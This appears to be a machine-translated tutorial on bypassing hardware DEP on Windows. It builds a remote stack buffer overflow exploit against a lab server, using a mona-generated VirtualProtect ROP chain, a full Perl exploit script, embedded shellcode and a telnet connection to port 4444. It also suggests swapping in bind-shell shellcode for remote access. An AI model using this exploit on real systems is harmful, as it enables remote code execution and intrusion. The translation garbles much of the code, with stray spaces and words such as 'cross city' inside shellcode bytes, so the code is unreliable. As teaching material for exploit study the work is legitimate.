A learning experience bypassing DEP (Hardware DEP)

A simple remote stack buffer overflow Experiment (3) What is bypassing DEP? Data Execution Protection (DEP) is a set of hardware and software technologies that can perform additional checks on the memory to help prevent malicious code from running on the system. In Microsoft Windows XP Service Pack 2, Microsoft Windows Server 2003 Service Pack 1, Microsoft Windows XP Tablet PC Edition 2005, Microsoft Windows Vista, and Microsoft Windows 7, DEP is enforced by hardware and software. DEP classification: hardware DEP: requires both CPU and system support; Software DEP: Actually SAFESEH; Bypassing DEP posture: API XPSP2 XPSP3 VistaSP0 VistaSP1 win7 win03SP1 win2008virtualAlloc yes yesHeapCreate yes yesSetProcessDEPPolicy no (1) yes no (1) yes no (2) no (1) yesNtSetInformationProcess yes no (2) no (2) yes no (2) VirtualProtect yes yesWriteProcessMemory yes regarding exploit Usability: Obviously, VirtualAlloc (), HeapCreate (), VirtualProtect (), and WriteProcessMemory () are among the most common exploit types. However, when building the rop chain, sometimes we have to hard encode some addresses in the gadget, which will lose its versatility. Corelan Team uses static addresses in some DLL to sort out some general drop CHAIN. I have to say that I like this team very much, because all my knowledge is learned through the articles they published. If you are confused or cannot solve the problem, you can raise it in their forum. They will give you some constructive suggestions. For the Generic rop chain, you can see here: https://www.corelan.be/index.php/security/corelan-ropdb/ Make a simple experiment: debug tool: immunity debugger (download on the canvas homepage, you know) required plug-in: mona (already out of v2, from corelan, Google corelan team) vulnerability program: http://code.securitytube.net/Server-Strcpy.exe (Program listening port: 10000) PS: Make sure you have enabled DEP (may need to restart) You can use any programming language you like to write this Exploit. Here I chose perl. let's take a look at the general structure of exploit. # Exploit. pluse IO: Socket; if (! ($ ARGV [1]) {print "Usage: perl $0 <Host> <Port> \ n"; exit ;}$ buf = "pattern "; $ socket = IO: Socket: INET-> new (PeerAddr => $ ARGV [0], PeerPort => $ ARGV [1], Proto => 'tcp ',) or die "Create socket fail! \ N "; print" Exploit ...... \ N "; if (send ($ socket, $ buf, 0) = length ($ buf) {# determine whether data in $ buf is completely sent print" Send Successful! \ N "; print" Connect to port 4444 ...... \ N "; system (" telnet $ ARGV [0] 4444 "); # remote login} else {print" Send Fail! \ N "; exit;} close $ socket; Brief steps: 1. determine the size of junkcode first. We can use mona to generate a 1000-byte pattern, like this :! Mona pattern_create 1000 generates a pattern.txt file in the work directory of immunity debugger. Assign the pattern value to $ buf =. Then use immunity debugger=server-strcpy.exe. Send pattern through exploit. pl. Like this: exploit. pl 127.0.0.1 10000 is followed by the mona computing offser in the immunity debugger. Like this :! Mona pattern_offset 0x12345678 returns the offset of 268. Then our junkcode should be like this: $ buf = "\ x41" x 268; then we add $ buf to the next line. = "\ x42" x 4; $ buf. = "1 abcdefghijk"; if it succeeds, the EIP will change to 42424242, and ESP will start from 1bcdefghijk. Make sure everything works. Next we will build our drop CHAIN. We only need mona to help us with all this: Use immunity debugger our server-strcpy.exe and enter the command :! Mona drop-m *. dll-cp nonull it takes about 5 minutes to construct this drop chain for you. Listen to the song and rest! After all the work is done, go to the root directory of immunity debuggerand open rop_chains.txt. He provides us with a lot of gestures, and the code is also well written with python, js, and ruby. We select a VirtualProtect (); The py Code provided by mona is probably like this: def create_rop_chain (): # rop chain generated with mona. py-www. corelan. berop_gadgets = "" rop_gadgets + = struct. pack ('<l', 0x77c22217) # pop eax # RETN [msvcrt. dll] rop_gadgets + = struct. pack ('<L', 0x77be1120) # ptr to & VirtualProtect () [IAT msvcrt. dll] rop_gadgets + = struct. pack ('<l', 0x77e62cf4) # mov eax, dword ptr ds: [EAX] # RETN [RPCRT4.dll] rop_gadgets + = Struct. pack ('<l', 0x77eac3bc) # xchg eax, ESI # RETN [RPCRT4.dll] rop_gadgets + = struct. pack ('<l', 0x77c16163) # pop ebp # RETN [msvcrt. dll] rop_gadgets + = struct. pack ('<l', 0x77debe1b) # & jmp esp [ADVAPI32.dll] rop_gadgets + = struct. pack ('<l', 0x77e8253d) # pop eax # RETN [RPCRT4.dll] rop_gadgets + = struct. pack ('<l', 0 xfffffdff) # Value to negate, will become 0x00000201rop_gadgets + = struct. pack ('<l ', 0x77e6b47c) # neg eax # RETN [RPCRT4.dll] rop_gadgets + = struct. pack ('<l', 0x77dc563a) # xchg eax, EBX # RETN [ADVAPI32.dll] rop_gadgets + = struct. pack ('<l', 0x7c87f325) # pop eax # RETN [kernel32.dll] rop_gadgets + = struct. pack ('<l', 0xffffffc0) # Value to negate, will become 0x00000040rop_gadgets + = struct. pack ('<l', 0x77da9f8) # neg eax # RETN [ADVAPI32.dll] rop_gadgets + = struct. pack ('<l', 0x7c9520 8f) # xchg eax, EDX # RETN [ntdll. dll] rop_gadgets + = struct. pack ('<l', 0x77c0f009) # pop ecx # RETN [msvcrt. dll] rop_gadgets + = struct. pack ('<L', 0x71a15119) # & Writable location [WS2HELP. dll] rop_gadgets + = struct. pack ('<L', 0x77e58608) # pop edi # RETN [RPCRT4.dll] rop_gadgets + = struct. pack ('<l', 0x77e6bf1c) # RETN (rop nop) [RPCRT4.dll] rop_gadgets + = struct. pack ('<l', 0x77df5c1f) # pop eax # RETN [DVAPI32.dll] rop_gadgets + = struct. pack ('<l', 0x90909090) # noprop_gadgets + = struct. pack ('<L', 0x77e7edb2) # PUSHAD # RETN [RPCRT4.dll] return rop_gadgets rop_chain = create_rop_chain () to change it to perl code; $ buf. = pack ('V', 0x77c22217); # pop eax # RETN [msvcrt. dll] $ buf. = pack ('V', 0x77be1120); # ptr to & VirtualProtect () [IAT msvcrt. dll] $ buf. = pack ('V', 0x77e62cf4); # mov eax, dword ptr ds: [EAX] # RET N [RPCRT4.dll] $ buf. = pack ('V', 0x77eac3bc); # xchg eax, ESI # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77c16163); # pop ebp # RETN [msvcrt. dll] $ buf. = pack ('V', 0x77debe1b); # & jmp esp [ADVAPI32.dll] $ buf. = pack ('V', 0x77e8253d); # pop eax # RETN [RPCRT4.dll] $ buf. = pack ('V', 0 xfffffdff); # Value to negate, will become 0x00000201 $ buf. = pack ('V', 0x77e6b47c); # neg eax # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77dc563a); # xchg eax, EBX # RETN [ADVAPI32.dll] $ buf. = pack ('V', 0x7c87f325); # pop eax # RETN [kernel32.dll] $ buf. = pack ('V', 0xffffffc0); # Value to negate, will become 0x00000040 $ buf. = pack ('V', 0x77da9f8); # neg eax # RETN [ADVAPI32.dll] $ buf. = pack ('V', 0x7c95208f); # xchg eax, EDX # RETN [ntdll. dll] $ buf. = pack ('V', 0x77c0f009); # pop ecx # RETN [msvcrt. dll] $ buf. = pack ('V', 0x71a15119 ); # & Writable location [WS2HELP. dll] $ buf. = pack ('V', 0x77e58608); # pop edi # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77e6bf1c); # RETN (rop nop) [RPCRT4.dll] $ buf. = pack ('V', 0x77df5c1f); # pop eax # RETN [ADVAPI32.dll] $ buf. = pack ('V', 0x90909090); # nop $ buf. = pack ('V', 0x77e7edb2); # PUSHAD # RETN [RPCRT4.dll] if our original model is junnkcode EIP shellcode, it should be like this: junkcode ROPCHAIN shellcode allows us to find a shellcod E. Of course, you can choose to let metaspploit generate one for you. my $ shellcode = "\ xdb \ xc0 \ x31 \ xc9 \ xbf \ x7c \ x16 \ cross city \ xcc \ xd9 \ x74 \ x24 \ xf4 \ xb1 ". "\ x1e \ x58 \ x31 \ x78 \ x18 \ x83 \ xe8 \ xfc \ x03 \ x78 \ x68 \ xf4 \ x85 \ x30 ". "\ x78 \ xbc \ x65 \ xc9 \ x78 \ xb6 \ x23 \ xf5 \ xf3 \ xb4 \ xae \ x7d \ x02 \ xaa ". "\ x3a \ x32 \ x1c \ xbf \ x62 \ xed \ x1d \ x54 \ xd5 \ x66 \ x29 \ x21 \ xe7 \ x96 ". "\ x60 \ xf5 \ x71 \ xca \ x06 \ x35 \ xf5 \ x14 \ xc7 \ x7c \ xfb \ x1b \ x05 \ x6b ". "\ xf0 \ x27 \ xdd \ x48 \ xfd \ x22 \ x38 \ x1b \ xa2 \ xe8 \ xc3 \ xf7 \ x3b \ x 7a ". "\ xcf \ x4c \ x4f \ x23 \ xd3 \ x53 \ xa4 \ x57 \ xf7 \ xd8 \ x3b \ x83 \ x8e \ x83 ". "\ x1f \ x57 \ x53 \ x64 \ x51 \ xa1 \ x33 \ xcd \ xf5 \ xc6 \ xf5 \ xc1 \ x7e \ x98 ". "\ xf5 \ xaa \ xf1 \ x05 \ xa8 \ x26 \ x99 \ x3d \ x3b \ xc0 \ xd9 \ xfe \ x51 \ x61 ". "\ xb6 \ x0e \ x2f \ x85 \ x19 \ x87 \ xb7 \ x78 \ x2f \ x59 \ x90 \ x7b \ xd7 \ x05 ". "\ x7f \ xe8 \ x7b \ xca"; put all the writes into one piece, which is our final exploit: use IO: Socket; if (! ($ ARGV [1]) {print "Usage: perl $0 <Host> <Port> \ n"; exit ;}$ buf = "\ x41" x 268; $ buf. = pack ('V', 0x77c22217); # pop eax # RETN [msvcrt. dll] $ buf. = pack ('V', 0x77be1120); # ptr to & VirtualProtect () [IAT msvcrt. dll] $ buf. = pack ('V', 0x77e62cf4); # mov eax, dword ptr ds: [EAX] # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77eac3bc); # xchg eax, ESI # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77c16163); # pop ebp # RETN [Msvcrt. dll] $ buf. = pack ('V', 0x77debe1b); # & jmp esp [ADVAPI32.dll] $ buf. = pack ('V', 0x77e8253d); # pop eax # RETN [RPCRT4.dll] $ buf. = pack ('V', 0 xfffffdff); # Value to negate, will become 0x00000201 $ buf. = pack ('V', 0x77e6b47c); # neg eax # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77dc563a); # xchg eax, EBX # RETN [ADVAPI32.dll] $ buf. = pack ('V', 0x7c87f325); # pop eax # RETN [kernel32.dll] $ buf. = pac K ('V', 0xffffffc0); # Value to negate, will become 0x00000040 $ buf. = pack ('V', 0x77da9f8); # neg eax # RETN [ADVAPI32.dll] $ buf. = pack ('V', 0x7c95208f); # xchg eax, EDX # RETN [ntdll. dll] $ buf. = pack ('V', 0x77c0f009); # pop ecx # RETN [msvcrt. dll] $ buf. = pack ('V', 0x71a15119); # & Writable location [WS2HELP. dll] $ buf. = pack ('V', 0x77e58608); # pop edi # RETN [RPCRT4.dll] $ buf. = pack ('V', 0x77e6bf1c ); # RETN (rop nop) [RPCRT4.dll] $ buf. = pack ('V', 0x77df5c1f); # pop eax # RETN [ADVAPI32.dll] $ buf. = pack ('V', 0x90909090); # nop $ buf. = pack ('V', 0x77e7edb2); # PUSHAD # RETN [RPCRT4.dll] $ buf. = "\ xdb \ xc0 \ x31 \ xc9 \ xbf \ x7c \ x16 \ cross 7 \ xcc \ xd9 \ x74 \ x24 \ xf4 \ xb1 ". "\ x1e \ x58 \ x31 \ x78 \ x18 \ x83 \ xe8 \ xfc \ x03 \ x78 \ x68 \ xf4 \ x85 \ x30 ". "\ x78 \ xbc \ x65 \ xc9 \ x78 \ xb6 \ x23 \ xf5 \ xf3 \ xb4 \ xae \ x7d \ x02 \ xaa ". "\ x3a \ x32 \ x1c \ xbf \ x62 \ xed \ x1 D \ x54 \ xd5 \ x66 \ x29 \ x21 \ xe7 \ x96 ". "\ x60 \ xf5 \ x71 \ xca \ x06 \ x35 \ xf5 \ x14 \ xc7 \ x7c \ xfb \ x1b \ x05 \ x6b ". "\ xf0 \ x27 \ xdd \ x48 \ xfd \ x22 \ x38 \ x1b \ xa2 \ xe8 \ xc3 \ xf7 \ x3b \ x7a ". "\ xcf \ x4c \ x4f \ x23 \ xd3 \ x53 \ xa4 \ x57 \ xf7 \ xd8 \ x3b \ x83 \ x8e \ x83 ". "\ x1f \ x57 \ x53 \ x64 \ x51 \ xa1 \ x33 \ xcd \ xf5 \ xc6 \ xf5 \ xc1 \ x7e \ x98 ". "\ xf5 \ xaa \ xf1 \ x05 \ xa8 \ x26 \ x99 \ x3d \ x3b \ xc0 \ xd9 \ xfe \ x51 \ x61 ". "\ xb6 \ x0e \ x2f \ x85 \ x19 \ x87 \ xb7 \ x78 \ x2f \ x59 \ x90 \ x7b \ xd7 \ x05 ". "\ x7f \ xe 8 \ x7b \ xca "; $ socket = IO: Socket: INET-> new (PeerAddr => $ ARGV [0], PeerPort => $ ARGV [1], proto => 'tcp ',) or die "Create socket fail! \ N "; print" Exploit ...... \ N "; if (send ($ socket, $ buf, 0) = length ($ buf) {# determine whether data in $ buf is completely sent print" Send Successful! \ N "; print" Connect to port 4444 ...... \ N "; system (" telnet $ ARGV [0] 4444 "); # remote login} else {print" Send Fail! \ N "; exit;} close $ socket; now, if you are lucky, you can see your calc replays. Although this is just a simple example, I think everything has to begin with a simple one. if you replace shellcode with the shellcode of bind shell, you should obtain a shell at this time. for more information, see.